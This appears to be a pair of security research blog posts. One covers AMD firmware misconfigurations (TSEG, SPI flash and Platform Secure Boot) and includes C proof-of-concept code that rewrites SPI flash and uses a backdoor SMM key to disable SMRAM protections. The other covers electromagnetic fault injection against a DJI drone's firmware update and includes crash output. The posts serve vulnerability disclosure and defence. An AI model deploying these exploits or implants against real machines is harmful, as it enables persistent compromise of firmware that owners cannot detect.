Friday, June 23, 2023

Back to the Future with Platform Security

by Enrique Nissim, Krzysztof Okupski and Joseph Tartaro


Introduction

During our recent talk at HardwearIO (see here, slides here) we described a variety of AMD platform misconfigurations that could lead to critical vulnerabilities, such as:

  • TSEG misconfigurations breaking SMRAM protections
  • SPI controller misconfigurations allowing SPI access from the OS
  • Platform Secure Boot misconfigurations breaking the hardware root-of-trust

Here we are providing a brief overview of essential registers settings and explain how our internally developed tool Platbox (see here) can be used to verify them and ultimately exploit them.


SMM Protections

In a previous blog post about AMD platform security (see here) we explained how forgetting to set a single lock can lead to a complete compromise of System Management Mode (SMM).

To recap, on modern systems SMM lives in a protected memory region called TSEG and four Model Specific Registers (MSRs) need to be configured to guarantee these protections:

  • 0xC0010111 (SMM_BASE; base of SMM code)
  • 0xC0010112 (SMMAddr; defines TSEG base address)
  • 0xC0010113 (SMMMask; defines TSEG limit and TSEG enable bit)
  • 0xC0010015[SmmLock] (HWCR; defines lock of the aforementioned MSRs)

In the following we can see a breakdown of the aforementioned registers using Platbox on the Acer Swift 3 (model no. SF314-42; BIOS v1.10):


As marked in the output, the SMMLock bit in the Hardware Configuration Register (HWCR) hasn't been set and therefore the TSEG region protections can simply be disabled by a privileged OS attacker by disabling the TValid bit in the SMMMask MSR.

Additionally, to ensure that the SMM code lies within the protected TSEG region, one should also confirm that the SMM base address (stored in the SMM_BASE MSR) lies inside of TSEG.  In most cases the EDK2 framework will ensure that this is the case. It is also interesting to notice that  SMM_BASE is also locked when SMMLock is set, thus preventing relocation attacks.

One additional register that is relevant to the security of SMM is the SMM key register (stored in the SMM_KEY MSR at 0xC0010119; see p630 in [1]). This is a write-only MSR that can be set before SMMLock to create a password-protected mechanism to clear SMMLock later on.

As mentioned in our presentation, while we haven't found an OEM using this register, we used it as part of an exploit to demonstrate persistence in vulnerable platforms.


SPI Flash Protections

The SPI flash plays an important role in the context of platform security as it is used to store both the UEFI BIOS firmware code and configuration data (e.g. the Secure Boot state).

Architecturally, firmware code should only be modified at boot-time during firmware updates (via signed capsule updates) whereas portions of configuration data can be modified at run-time (in a controlled way via SMM).

To enforce this, the SPI controller-related protections need to be configured accordingly. In the following we will explain the relevant protection mechanisms, both the classic ones and the modern ones that will soon replace them.


Classic Protections

Two classic protection mechanisms exist, referred to as ROM protected ranges and SPI restricted commands, each responsible for preventing different types of accesses (see p445 in [2]).

First, ROM protected ranges apply to direct accesses via memory-mapped IO which, in turn, are automatically translated by the hardware into transactions on the SPI bus.

These ranges are configured via four write-once ROM protect registers (see p440 in [2]):

  • D14F3x050 FCH::ITF::LPC::RomProtect0
  • D14F3x054 FCH::ITF::LPC::RomProtect1
  • D14F3x058 FCH::ITF::LPC::RomProtect2
  • D14F3x05C FCH::ITF::LPC::RomProtect3

As we can see below, each of these registers defines the base address, the size and the access protection (read / write):



At the same time, it is important to enable and lock the ROM protected ranges with the AltSPICS register (see p450 in [2]):

  • SPIx01D FCH::ITF::SPI::AltSPICS[SpiProtectEn0]
  • SPIx01D FCH::ITF::SPI::AltSPICS[SpiProtectEn1]
  • SPIx01D FCH::ITF::SPI::AltSPICS[SpiProtectLock]

However, we observed that although some systems don't configure these ranges, we haven't been able to perform writes to the SPI flash using this method neither from the OS nor from SMM.

Second, SPI restricted commands apply to indirect accesses via the SPI controller wherein SPI registers are programmed directly. As part of it, two restricted command registers are configured (see p447-448 in [2]):

  • SPIx004 FCH::ITF::SPI::SPIRestrictedCmd
  • SPIx008 FCH::ITF::SPI::SPIRestrictedCmd2

Each of these registers defines up to four SPI opcodes that are blocked. Again, we can see the breakdown below:


In this example we can see that SPI writes are blocked altogether by restricting the Write Enable (WREN) opcode that needs to be sent before every SPI write operation.

In practice, when SMM code needs to perform a SPI write transaction it will temporarily disable the restricted command registers, perform the write operation and then restore the restricted command registers again.

In case these protections are misconfigured, as we have observed on various systems, a privileged OS attacker can easily exploit this issue. In the following we see a simple proof-of-concept that will patch portions of the SPI flash (see here):

void proof_of_concept()
{
    amd_retrieve_chipset_information(); 


    // Read and print SPI flash portion
    BYTE *mem = (BYTE *)calloc(1, 4096);
    read_from_flash_index_mode(NULL, target_fla, 4096, mem);
    print_memory(0xFD00000000 + target_fla, (char *)mem, 0x100);
  
    // Patch SPI flash
    UINT32 target_fla = 0x00000000;
    const char msg[] = "Dude, there is a hole in my BIOS";
    amd_spi_write_buffer(NULL, target_fla, (BYTE *)msg, strlen(msg));
    

    // Read and print modified SPI flash portion
    read_from_flash_index_mode(NULL, target_fla, 4096, mem);
    print_memory(0xFD00000000 + target_fla, (char *)mem, 0x100);
    free(mem);
}


In short, the code will first print the portion of the flash that is to be patched. It will then patch it, and finally print the modified flash portion again. The amd_spi_write_buffer() API automatically handles reading the affected SPI flash pages, patching them and writing them back.


Modern SPI Protections

On more modern systems we have observed that the aforementioned protection mechanisms are slowly being replaced by a newer technology referred to as ROM Armor.

In essence, ROM Armor is AMD's equivalent of Intel's Protected Range Registers (PRRs) and ensures that only whitelisted portions of the SPI flash can be modified at run-time (in a controlled fashion via SMM).

To determine which portions of the SPI flash are whitelisted, we developed a script that parses the PSP directory and extracts the whitelisted regions (see here):

Note that in this case we used an Acer TravelMate P4 (model no. TMP414-41-R854; BIOS v1.08) instead as this technology is only present in most recent systems.


Hardware Root-of-Trust Configurations

Platform Secure Boot (PSB) is AMD's implementation of a hardware root-of-trust and ensures that initial phases of the UEFI BIOS firmware haven't been tampered with and is the main line of defense against persistent firmware implants.

PSB is implemented using an embedded chip called the Platform Security Processor (PSP). In order for PSB to be enforced, the UEFI BIOS firmware needs to be built accordingly and the PSB related fuses in the PSP need to be configured.

We've found that two registers in particular can be leveraged to determine whether PSB has been enabled correctly:

  • PSB Fuse Register (defines fuse configuration)
  • PSB State Register (defines configuration state)

While the PSB fuse register can be used to determine whether PSB has been enabled and the fuses have been locked, the PSB state register indicates the status of the PSB configuration.

Herein we can see a more detailed breakdown of these registers:


As we can see, the Acer Swift 3 does not properly configure the PSB fuses and the PSB status indicates that an error has occurred.

The following video demonstrates how the ability to write to the SPI flash (via an SMI vulnerability or SPI controller misconfigurations), combined with the lack of PSB, results in a persistent firmware implant.

First, we attempt to read the TSEG region and see that it's not accessible as it returns FFs only. We therefore patch the firmware with our backdoor inside of it via a vulnerable SMI handler and reset the system:




Next, we attempt to read the TSEG region again and see that the result is the same. However, this time around after disabling the TSEG protections via the SMM_KEY that was configured by our backdoor, we are able to read it out:


Here is the proof-of-concept that leverages the SMM key configured by the backdoor, clears the SmmLock bit in the HWCR register and finally disables TSEG protections (see here):

#define MSR_SMM_KEY     0xC0010119
#define MSR_SMM_KEY_VAL 0x494f414354495645

int main(int argc, char **argv)
  open_platbox_device();
  
  // Fetching TSEG base address and size
  UINT64 tseg_base = 0;
  UINT32 tseg_size = 0;
  get_tseg_region(&tseg_base, &tseg_size);
  printf("TSEG Base: %08x\n", tseg_base);
  printf("TSEG  End: %08x\n", tseg_base + tseg_size);

  // Reading start of TSEG region
  printf("\nReading TSEG region:\n");
  void *tseg_map = map_physical_memory(tseg_base, PAGE_SIZE);
  print_memory(tseg_base, (char *) tseg_map, 0x100);
  unmap_physical_memory(tseg_map, PAGE_SIZE);
  
  // Disabling TSEG protections using backdoor
  getchar();
  printf("=> Setting SMM Key\n");
  do_write_msr(MSR_SMM_KEY, MSR_SMM_KEY_VAL);

  getchar();
  printf("=> Disabling TSEG protection\n");
  UINT64 tseg_mask = 0;
  do_read_msr(AMD_MSR_SMM_TSEG_MASK, &tseg_mask);
  do_write_msr(AMD_MSR_SMM_TSEG_MASK, tseg_mask & 0xFFFFFFFFFFFFFFFC);

  // Reading start of TSEG region
  getchar();
  printf("\nReading TSEG region:\n");
  tseg_map = map_physical_memory(tseg_base, PAGE_SIZE);
  print_memory(tseg_base, (char *) tseg_map, 0x100);
  unmap_physical_memory(tseg_map, PAGE_SIZE);
  
  close_platbox_device();

  return 0;
}

SMM Supervisor OEM Policies

The SMM Supervisor is AMD's approach at deprivileging and isolating SMI handlers. When implemented, SMI handlers need to go through an enforcement module to gain access to MSRs and IO registers. Additionally, paging is added which limits their access to arbitrary system memory. Everytime an SMI attempts to access these privileged resources, an OEM policy is checked to see if they can have access or not. 

OEM policies live within the Freeform Blob called SmmSupvBin with the GUID {83E1F409-21A3-491D-A415B163A153776D}.  The policy contains multiple types of entries:
  • Memory
  • IO Register
  • MSR
  • Instruction
  • SaveState
A small utility is available in the Platbox repository (see here). This utility will attempt to parse UEFI images and extract the policy, or if you provide a raw policy format that has been previously extracted it will print the details.

For example, this is a section of an OEM policy which is specifically restricting IO Register Write access to the IO Registers 0xCF8 and 0xCFC, thus specifically restricting access to PCI configuration space. We believe that this will come in handy in the future to perform baseline comparisons against OEM policies across various platforms. It gives researchers the ability to quickly see if an OEM failed to restrict a specific MSR or IO Register which may aid an attacker.


We believe that this will come in handy in the future to perform baseline comparisons against OEM policies across various platforms. It gives researchers the ability to quickly see if an OEM failed to restrict a specific MSR or IO Register which may aid an attacker.


Resources

[1] AMD64 Architecture Programmer’s Manual, Volume 2: System Programming

[2] Processor Programming Reference (PPR) for AMD Family 17h Model 20h, Revision A1 Processors


 

Tuesday, June 13, 2023

Applying Fault Injection to the Firmware Update Process of a Drone

IOActive recently published a whitepaper (https://ioac.tv/3N005Bn) covering the current security posture of the drone industry. IOActive has been researching the possibility of using non-invasive techniques, such as electromagnetic (EM) side-channel attacks or EM fault injection (EMFI), to achieve code execution on a commercially available drone with significant security features. For this work, we chose one of the most popular drone models, DJI’s Mavic Pro. DJI is a seasoned manufacturer that emphasizes security in their products with features such as signed and encrypted firmware, Trusted Execution Environment (TEE), and Secure Boot.

Attack Surface 

Drones are used in variety of applications, including military, commercial, and recreational. Like any other technology, drones are vulnerable to various types of attacks that can compromise their functionality and safety. 

 
 

As illustrated above, drones expose several attack surfaces: (1) backend, (2) mobile apps, (3) radio frequency (RF) communication, and (4) physical device.

As detailed in the whitepaper (https://ioac.tv/3N005Bn), IOActive used EM emanations and EMFI due to their non-invasive nature. We leveraged Riscure products as the main tools for this research.

The image below show the PCB under analysis after being removed from the drone; power has been connected to an external power supply.

First Approach

Our first approach was to attempt to retrieve the encryption key using EM emanations and decrypting the firmware. We started by finding an area on the drone’s PCB with a strong EM signal so we could place a probe and record enough traces to extract the key.

After identifying the location with strongest signal, we worked on understanding how to bypass the signature verification that takes place before the firmware is decrypted. After several days of testing and data analysis, we found that the probability of successful signature bypass was less than 0.5%. This rendered key recovery unfeasible, since it would have required us to collect the tens of thousands of traces.

Second Approach

Our second approach was to use EMFI based on the ideas published by Riscure (https://www.riscure.com/publication/controlling-pc-arm-using-fault-injection). Riscure proposes using a glitch to cause one instruction to transform into another and gain control of, for example, the PC register. The following image shows the setup we used for this approach, which included a laptop (used as a controller), a power supply, Riscure’s Spider (used to generate the trigger), an oscilloscope, an XYZ table, and the EMFI pulse-generator.


After identifying a small enough area on the PCB, we modified the glitch’s shape and timing until we observed a successful result. The targeted process crashed, as shown below:  

Program received signal SIGSEGV, Segmentation fault.

0x2a002f44 in ?? ()

#0  0x2a002f44 in ?? ()

#1  0x2a000f5a in ?? ()

#2  0x2a0011de in ?? ()

#3  0x2a000b04 in ?? ()

#4  0xb6f9b42c in __libc_init () from /system/lib/libc.so

#5  0x2a00099c in ?? ()

Backtrace stopped: previous frame identical to this frame (corrupt stack?)

r0             0x41414141  1094795585

r1             0x41414141  1094795585

r2             0xbefff6dc  3204445916

r3             0x41414141  1094795585

r4             0x41414141  1094795585

r5             0xbefffbc4  3204447172

r6             0x85242d9a  2233740698

r7             0xbefff6f0  3204445936

r8             0xb6b4e008  3065307144

r9             0xb6b4e1e8  3065307624

r10            0xbefffad0  3204446928

r11            0x2d7160  2978144

r12            0xbefff6ec  3204445932

sp             0xbefff6c8  0xbefff6c8

lr             0xde  222

pc             0x2a002f44  0x2a002f44

cpsr           0x60000030  1610612784

Our payload appeared in several registers. After examining the code at the target address, we determined that we had hit a winning combination of timing, position, and glitch shape. The following capture shows the instruction where a segmentation error took place:


The capture clearly shows a load instruction copying our data to registers R0 and R1. In addition, the GDB output also shows that registers R3 and R4 ended up with controlled data. Further details can be found in the whitepaper (https://ioac.tv/3N005Bn).

Having successfully caused memory corruption, the next step would be to design a proper payload that achieves code execution. An attacker could use such an exploit to fully control one device, leak all sensitive content, enable ADB access, and potentially leak the encryption keys.

Disclosure Timeline

The DJI team response was excellent, fast and supportive.

2023-04-04: Initial Contact with DJI including sharing report.
2023-05-04: DJI agrees on publication date.